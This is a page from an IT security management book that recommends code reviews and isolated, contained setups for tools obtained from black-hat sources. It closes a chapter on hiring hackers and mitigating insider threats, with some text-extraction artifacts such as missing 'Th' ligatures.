Keep Your Enemies Closer ◾ 251
impossible to hide from a skilled code reviewer. Code reviews are your best defense against
logic bombs, backdoors, and other types of malicious code in tools you acquire from black-hat
resources—so much so that we recommend decompiling binaries and reviewing the resulting
source code if source code is not available for a particular tool. e issue involved in doing code
reviews is usually one of resourcing. Code reviews are tedious and time consuming and require a
rather sophisticated set of skills, so there is a trade-off . Smaller utilities and tools should be source
code reviewed. For larger applications, an execution review combined with other mitigation con-
trols such as sandboxing and IPS may prove to be more cost eff ective.
e following actions are recommended for the malicious content implantation control
objective:
1. Identify resources that can assist with code reviews and tool evaluations.
2. Develop appropriate procedures for dealing with malicious content to ensure that it is at all
times contained to include management and custody controls for all media containing mali-
cious code.
3. Gather and test the recommended best practices for high security hardening of the plat-
forms you are using for reconnaissance.
4. Determine the equipment and resources required to set up an isolated reconnaissance capa-
bility, including capital and run expense estimates.
5. Acquire and test potential security controls for malicious content, behavior, or results detection.
6. Acquire and test system recovery or rebuild tools that permit quick recovery from a system
that has been compromised.
Conclusion
is chapter covered two important personnel-related tactics. e fi rst, hire a hacker, discussed
the merits of hiring clever people to assess security controls, improve security products, and recon
future threats or exploits. e second tactic, countering insider threats, discussed control objectives
for mitigating risks associated with malicious insider activities. e use of “hackers” in the context
of IT security is entirely dependent on the objectives the organization is trying to achieve. e
use of white-hats to improve the security function of your products and service is a good practice.
Security professionals generally consider employing “reformed” black-hat hackers to be a bad idea,
although there doesn’t appear to be any body of evidence to support the notion that this practice
substantially increases risk. In truth, all employees have the potential to commit malicious acts,
and insiders typically will do three times the damage that an external attacker might do.
Malicious insiders have authorized access that bypasses most network and host-based controls;
weaknesses in operating system and applications controls exacerbate the problem by granting
users access to inordinate amounts of data. Management complacency, corporate culture, empow-
erment, erratic enforcement, and missing supervisor skills also add to the problem. Company
processes, including audit, hiring, and termination practices, supervisory controls, and incident
response, are often inept and require technologies to manage user identities, collate physical and
logical accesses, and detect unauthorized activities. e problem is systemic; the industry is just
now starting to recognize the tremendous risk that insider malfeasance represents to companies,
agencies, and the public. is isn’t a hired hacker problem; it’s an “everybody problem,” and until
technology catches up with the need, the best mitigation we have at hand is competent supervi-
sion: Nurture and promote it.
TAF-K11348-10-0301-C012.indd 251TAF-K11348-10-0301-C012.indd 251 8/18/10 3:11:57 PM8/18/10 3:11:57 PM